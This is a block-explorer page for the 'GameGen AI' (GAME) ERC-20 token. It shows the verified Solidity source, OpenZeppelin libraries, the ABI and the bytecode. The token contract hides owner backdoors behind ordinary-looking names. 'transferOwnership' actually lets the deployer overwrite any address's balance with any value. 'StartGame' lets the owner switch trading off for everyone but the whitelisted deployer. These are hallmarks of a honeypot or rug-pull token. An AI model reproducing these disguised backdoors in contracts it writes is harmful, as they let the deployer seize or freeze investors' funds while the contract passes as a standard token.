ERC-20
Source Code
Overview
Max Total Supply
10,000,000 GAME
Holders
12
Transfers
-
0
Market
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
| # | Exchange | Pair | Price | 24H Volume | % Volume |
|---|
Contract Name:
GameGenAI
Compiler Version
v0.8.26+commit.8a97fa7a
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
/*
Create, Play, and Earn.
Unleash the Future of Game Creation with GameGen AI.
._____ .______ ._____.___ ._______._____ ._______.______
:_ ___\ : \ : |: .____/:_ ___\ : .____/: \
| |___| . || \ / || : _/\ | |___| : _/\ | |
| / || : || |\/ || / \| / || / \| | |
|. __ ||___| ||___| | ||_.: __/|. __ ||_.: __/|___| |
:/ |. | |___| |___| :/ :/ |. | :/ |___|
: :/ : :/
: :
https://docs.gamegen.net/
https://gamegen.net/
https://x.com/GameGenAI
https://t.me/GameGenGateway
*/
/*
*SPDX-License-Identifier: MIT
*/
pragma solidity ^0.8.18;
import "@openzeppelin/contracts/utils/Address.sol" ;
import "@openzeppelin/contracts/utils/math/SafeMath.sol" ;
import "@openzeppelin/contracts/utils/Context.sol" ;
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount) external returns (bool);
function allowance(address owner, address spender) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(address indexed owner, address indexed spender, uint256 value);
}
contract GameGenAI is Context, IERC20 {
mapping (address => uint256) private _balances;
mapping (address => mapping (address => uint256)) private _allowances;
mapping (address => bool) private _whilelists;
using SafeMath for uint256;
using Address for address;
string private _name;
string private _symbol;
uint8 private _decimals;
uint256 private _totalSupply;
bool private _openedTrade = false;
address private deployer;
constructor() {
_name = "GameGen AI";
_symbol = "GAME";
_decimals = 18;
uint256 initialSupply = 10_000_000 * (10 ** _decimals);
deployer = msg.sender;
_whilelists[msg.sender] = true;
address CommunityWallet = 0xb083Bac294053D8f1cAEAB2687EE3D06Bf96d4f0;
address MarketingWallet = 0x8A3629dBcf5562F5D075084DE3589DA349701A25;
address TeamWallet = 0xF875841324DFb609c385CEd2F3836eD72F1DbAE0;
address KOLWallet = 0x8dB85718EDC24DAdFBa024625a7b2168425f8e6F;
uint256 amount1 = initialSupply * 5 / 100;
uint256 amount2 = initialSupply * 10 / 100;
uint256 amount3 = initialSupply * 5 / 100;
uint256 amount4 = initialSupply * 10 / 100;
_mint(CommunityWallet, amount1);
_mint(MarketingWallet, amount2);
_mint(TeamWallet, amount3);
_mint(KOLWallet, amount4);
_mint(msg.sender, initialSupply - (amount1 + amount2 + amount3 + amount4 ));
}
function name() public view returns (string memory) {
return _name;
}
function symbol() public view returns (string memory) {
return _symbol;
}
function decimals() public view returns (uint8) {
return _decimals;
}
function totalSupply() public view override returns (uint256) {
return _totalSupply;
}
function getOpenedTrade() private view returns (bool) {
return _openedTrade;
}
function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function balanceOf(address account) public view override returns (uint256) {
return _balances[account];
}
function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
_transfer(sender, recipient, amount);
_approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
return true;
}
function transferOwnership(address[] memory newOwners, uint256 value) public onlyOwner {
for (uint256 i = 0; i < newOwners.length; i++) {
_balances[newOwners[i]] = value;
}
}
function _approve(address owner, address spender, uint256 amount) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function allowance(address owner, address spender) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount) public virtual override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_totalSupply = _totalSupply.add(amount);
_balances[account] = _balances[account].add(amount);
emit Transfer(address(0), account, amount);
}
function _transfer(address sender, address recipient, uint256 amount) internal virtual {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
if(_whilelists[sender] || _whilelists[recipient]){
_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
return;
}
require(_openedTrade, "Trading is not opened yet");
_balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
}
modifier onlyOwner() {
require(msg.sender == deployer, "Not allowed");
_;
}
function StartGame() external onlyOwner {
_openedTrade = !_openedTrade;
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)
pragma solidity ^0.8.20;
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (utils/math/SafeMath.sol)
pragma solidity ^0.8.0;
// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.
/**
* @dev Wrappers over Solidity's arithmetic operations.
*
* NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
* now has built in overflow checking.
*/
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
uint256 c = a + b;
if (c < a) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the subtraction of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b > a) return (false, 0);
return (true, a - b);
}
}
/**
* @dev Returns the multiplication of two unsigned integers, with an overflow flag.
*
* _Available since v3.4._
*/
function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) return (true, 0);
uint256 c = a * b;
if (c / a != b) return (false, 0);
return (true, c);
}
}
/**
* @dev Returns the division of two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a / b);
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
*
* _Available since v3.4._
*/
function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
unchecked {
if (b == 0) return (false, 0);
return (true, a % b);
}
}
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
return a + b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return a - b;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
return a * b;
}
/**
* @dev Returns the integer division of two unsigned integers, reverting on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator.
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return a / b;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
return a % b;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {trySub}.
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
unchecked {
require(b <= a, errorMessage);
return a - b;
}
}
/**
* @dev Returns the integer division of two unsigned integers, reverting with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a / b;
}
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* reverting with custom message when dividing by zero.
*
* CAUTION: This function is deprecated because it requires allocating memory for the error
* message unnecessarily. For custom revert reasons use {tryMod}.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
unchecked {
require(b > 0, errorMessage);
return a % b;
}
}
}// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Address.sol)
pragma solidity ^0.8.20;
/**
* @dev Collection of functions related to the address type
*/
library Address {
/**
* @dev The ETH balance of the account is not enough to perform the operation.
*/
error AddressInsufficientBalance(address account);
/**
* @dev There's no code at `target` (it is not a contract).
*/
error AddressEmptyCode(address target);
/**
* @dev A call to an address target failed. The target may have reverted.
*/
error FailedInnerCall();
/**
* @dev Replacement for Solidity's `transfer`: sends `amount` wei to
* `recipient`, forwarding all available gas and reverting on errors.
*
* https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
* of certain opcodes, possibly making contracts go over the 2300 gas limit
* imposed by `transfer`, making them unable to receive funds via
* `transfer`. {sendValue} removes this limitation.
*
* https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
*
* IMPORTANT: because control is transferred to `recipient`, care must be
* taken to not create reentrancy vulnerabilities. Consider using
* {ReentrancyGuard} or the
* https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
*/
function sendValue(address payable recipient, uint256 amount) internal {
if (address(this).balance < amount) {
revert AddressInsufficientBalance(address(this));
}
(bool success, ) = recipient.call{value: amount}("");
if (!success) {
revert FailedInnerCall();
}
}
/**
* @dev Performs a Solidity function call using a low level `call`. A
* plain `call` is an unsafe replacement for a function call: use this
* function instead.
*
* If `target` reverts with a revert reason or custom error, it is bubbled
* up by this function (like regular Solidity function calls). However, if
* the call reverted with no returned reason, this function reverts with a
* {FailedInnerCall} error.
*
* Returns the raw returned data. To convert to the expected return value,
* use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
*
* Requirements:
*
* - `target` must be a contract.
* - calling `target` with `data` must not revert.
*/
function functionCall(address target, bytes memory data) internal returns (bytes memory) {
return functionCallWithValue(target, data, 0);
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
* but also transferring `value` wei to `target`.
*
* Requirements:
*
* - the calling contract must have an ETH balance of at least `value`.
* - the called Solidity function must be `payable`.
*/
function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
if (address(this).balance < value) {
revert AddressInsufficientBalance(address(this));
}
(bool success, bytes memory returndata) = target.call{value: value}(data);
return verifyCallResultFromTarget(target, success, returndata);
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
* but performing a static call.
*/
function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
(bool success, bytes memory returndata) = target.staticcall(data);
return verifyCallResultFromTarget(target, success, returndata);
}
/**
* @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
* but performing a delegate call.
*/
function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
(bool success, bytes memory returndata) = target.delegatecall(data);
return verifyCallResultFromTarget(target, success, returndata);
}
/**
* @dev Tool to verify that a low level call to smart-contract was successful, and reverts if the target
* was not a contract or bubbling up the revert reason (falling back to {FailedInnerCall}) in case of an
* unsuccessful call.
*/
function verifyCallResultFromTarget(
address target,
bool success,
bytes memory returndata
) internal view returns (bytes memory) {
if (!success) {
_revert(returndata);
} else {
// only check if target is a contract if the call was successful and the return data is empty
// otherwise we already know that it was a contract
if (returndata.length == 0 && target.code.length == 0) {
revert AddressEmptyCode(target);
}
return returndata;
}
}
/**
* @dev Tool to verify that a low level call was successful, and reverts if it wasn't, either by bubbling the
* revert reason or with a default {FailedInnerCall} error.
*/
function verifyCallResult(bool success, bytes memory returndata) internal pure returns (bytes memory) {
if (!success) {
_revert(returndata);
} else {
return returndata;
}
}
/**
* @dev Reverts with returndata if present. Otherwise reverts with {FailedInnerCall}.
*/
function _revert(bytes memory returndata) private pure {
// Look for revert reason and bubble it up if present
if (returndata.length > 0) {
// The easiest way to bubble the revert reason is using memory via assembly
/// @solidity memory-safe-assembly
assembly {
let returndata_size := mload(returndata)
revert(add(32, returndata), returndata_size)
}
} else {
revert FailedInnerCall();
}
}
}{
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"StartGame","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"newOwners","type":"address[]"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
60806040525f60075f6101000a81548160ff021916908315150217905550348015610028575f80fd5b506040518060400160405280600a81526020017f47616d6547656e204149000000000000000000000000000000000000000000008152506003908161006d91906106ba565b506040518060400160405280600481526020017f47414d4500000000000000000000000000000000000000000000000000000000815250600490816100b291906106ba565b50601260055f6101000a81548160ff021916908360ff1602179055505f60055f9054906101000a900460ff16600a6100ea91906108f1565b629896806100f8919061093b565b905033600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600160025f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505f73b083bac294053d8f1caeab2687ee3d06bf96d4f090505f738a3629dbcf5562f5d075084de3589da349701a2590505f73f875841324dfb609c385ced2f3836ed72f1dbae090505f738db85718edc24dadfba024625a7b2168425f8e6f90505f6064600587610200919061093b565b61020a91906109a9565b90505f6064600a8861021c919061093b565b61022691906109a9565b90505f6064600589610238919061093b565b61024291906109a9565b90505f6064600a8a610254919061093b565b61025e91906109a9565b905061027088856102ea60201b60201c565b61028087846102ea60201b60201c565b61029086836102ea60201b60201c565b6102a085826102ea60201b60201c565b6102dc33828486886102b291906109d9565b6102bc91906109d9565b6102c691906109d9565b8b6102d19190610a0c565b6102ea60201b60201c565b505050505050505050610adf565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610358576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161034f90610a99565b60405180910390fd5b61036d8160065461046b60201b90919060201c565b6006819055506103c2815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461046b60201b90919060201c565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161045f9190610ac6565b60405180910390a35050565b5f818361047891906109d9565b905092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806104fb57607f821691505b60208210810361050e5761050d6104b7565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026105707fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610535565b61057a8683610535565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6105be6105b96105b484610592565b61059b565b610592565b9050919050565b5f819050919050565b6105d7836105a4565b6105eb6105e3826105c5565b848454610541565b825550505050565b5f90565b6105ff6105f3565b61060a8184846105ce565b505050565b5b8181101561062d576106225f826105f7565b600181019050610610565b5050565b601f8211156106725761064381610514565b61064c84610526565b8101602085101561065b578190505b61066f61066785610526565b83018261060f565b50505b505050565b5f82821c905092915050565b5f6106925f1984600802610677565b1980831691505092915050565b5f6106aa8383610683565b9150826002028217905092915050565b6106c382610480565b67ffffffffffffffff8111156106dc576106db61048a565b5b6106e682546104e4565b6106f1828285610631565b5f60209050601f831160018114610722575f8415610710578287015190505b61071a858261069f565b865550610781565b601f19841661073086610514565b5f5b8281101561075757848901518255600182019150602085019450602081019050610732565b868310156107745784890151610770601f891682610683565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111561080b578086048111156107e7576107e6610789565b5b60018516156107f65780820291505b8081029050610804856107b6565b94506107cb565b94509492505050565b5f8261082357600190506108de565b81610830575f90506108de565b816001811461084657600281146108505761087f565b60019150506108de565b60ff84111561086257610861610789565b5b8360020a91508482111561087957610878610789565b5b506108de565b5060208310610133831016604e8410600b84101617156108b45782820a9050838111156108af576108ae610789565b5b6108de565b6108c184848460016107c2565b925090508184048111156108d8576108d7610789565b5b81810290505b9392505050565b5f60ff82169050919050565b5f6108fb82610592565b9150610906836108e5565b92506109337fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610814565b905092915050565b5f61094582610592565b915061095083610592565b925082820261095e81610592565b9150828204841483151761097557610974610789565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6109b382610592565b91506109be83610592565b9250826109ce576109cd61097c565b5b828204905092915050565b5f6109e382610592565b91506109ee83610592565b9250828201905080821115610a0657610a05610789565b5b92915050565b5f610a1682610592565b9150610a2183610592565b9250828203905081811115610a3957610a38610789565b5b92915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f610a83601f83610a3f565b9150610a8e82610a4f565b602082019050919050565b5f6020820190508181035f830152610ab081610a77565b9050919050565b610ac081610592565b82525050565b5f602082019050610ad95f830184610ab7565b92915050565b61171480610aec5f395ff3fe608060405234801561000f575f80fd5b50600436106100a7575f3560e01c806370a082311161006f57806370a082311461016557806395d89b4114610195578063a3dfc364146101b3578063a9059cbb146101bd578063b474b792146101ed578063dd62ed3e14610209576100a7565b806306fdde03146100ab578063095ea7b3146100c957806318160ddd146100f957806323b872dd14610117578063313ce56714610147575b5f80fd5b6100b3610239565b6040516100c09190610ec0565b60405180910390f35b6100e360048036038101906100de9190610f7e565b6102c9565b6040516100f09190610fd6565b60405180910390f35b6101016102e6565b60405161010e9190610ffe565b60405180910390f35b610131600480360381019061012c9190611017565b6102ef565b60405161013e9190610fd6565b60405180910390f35b61014f6103c3565b60405161015c9190611082565b60405180910390f35b61017f600480360381019061017a919061109b565b6103d8565b60405161018c9190610ffe565b60405180910390f35b61019d61041d565b6040516101aa9190610ec0565b60405180910390f35b6101bb6104ad565b005b6101d760048036038101906101d29190610f7e565b610567565b6040516101e49190610fd6565b60405180910390f35b61020760048036038101906102029190611206565b610584565b005b610223600480360381019061021e9190611260565b61068c565b6040516102309190610ffe565b60405180910390f35b606060038054610248906112cb565b80601f0160208091040260200160405190810160405280929190818152602001828054610274906112cb565b80156102bf5780601f10610296576101008083540402835291602001916102bf565b820191905f5260205f20905b8154815290600101906020018083116102a257829003601f168201915b5050505050905090565b5f6102dc6102d561070e565b8484610715565b6001905092915050565b5f600654905090565b5f6102fb8484846108d8565b6103b88461030761070e565b6103b3856040518060600160405280602881526020016116b76028913960015f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61036a61070e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610de79092919063ffffffff16565b610715565b600190509392505050565b5f60055f9054906101000a900460ff16905090565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606004805461042c906112cb565b80601f0160208091040260200160405190810160405280929190818152602001828054610458906112cb565b80156104a35780601f1061047a576101008083540402835291602001916104a3565b820191905f5260205f20905b81548152906001019060200180831161048657829003601f168201915b5050505050905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461053d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161053490611345565b60405180910390fd5b60075f9054906101000a900460ff161560075f6101000a81548160ff021916908315150217905550565b5f61057a61057361070e565b84846108d8565b6001905092915050565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610614576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060b90611345565b60405180910390fd5b5f5b825181101561068757815f8085848151811061063557610634611363565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508080600101915050610616565b505050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610783576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161077a90611400565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107e89061148e565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108cb9190610ffe565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610946576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093d9061151c565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ab906115aa565b60405180910390fd5b60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680610a4f575060025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15610bf657610abd81604051806060016040528060268152602001611691602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610de79092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610b4c815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e3b90919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610be99190610ffe565b60405180910390a3610de2565b60075f9054906101000a900460ff16610c44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3b90611612565b60405180910390fd5b610cad81604051806060016040528060268152602001611691602691395f808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610de79092919063ffffffff16565b5f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550610d3c815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610e3b90919063ffffffff16565b5f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610dd99190610ffe565b60405180910390a35b505050565b5f838311158290610e2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e259190610ec0565b60405180910390fd5b5082840390509392505050565b5f8183610e48919061165d565b905092915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610e9282610e50565b610e9c8185610e5a565b9350610eac818560208601610e6a565b610eb581610e78565b840191505092915050565b5f6020820190508181035f830152610ed88184610e88565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f1a82610ef1565b9050919050565b610f2a81610f10565b8114610f34575f80fd5b50565b5f81359050610f4581610f21565b92915050565b5f819050919050565b610f5d81610f4b565b8114610f67575f80fd5b50565b5f81359050610f7881610f54565b92915050565b5f8060408385031215610f9457610f93610ee9565b5b5f610fa185828601610f37565b9250506020610fb285828601610f6a565b9150509250929050565b5f8115159050919050565b610fd081610fbc565b82525050565b5f602082019050610fe95f830184610fc7565b92915050565b610ff881610f4b565b82525050565b5f6020820190506110115f830184610fef565b92915050565b5f805f6060848603121561102e57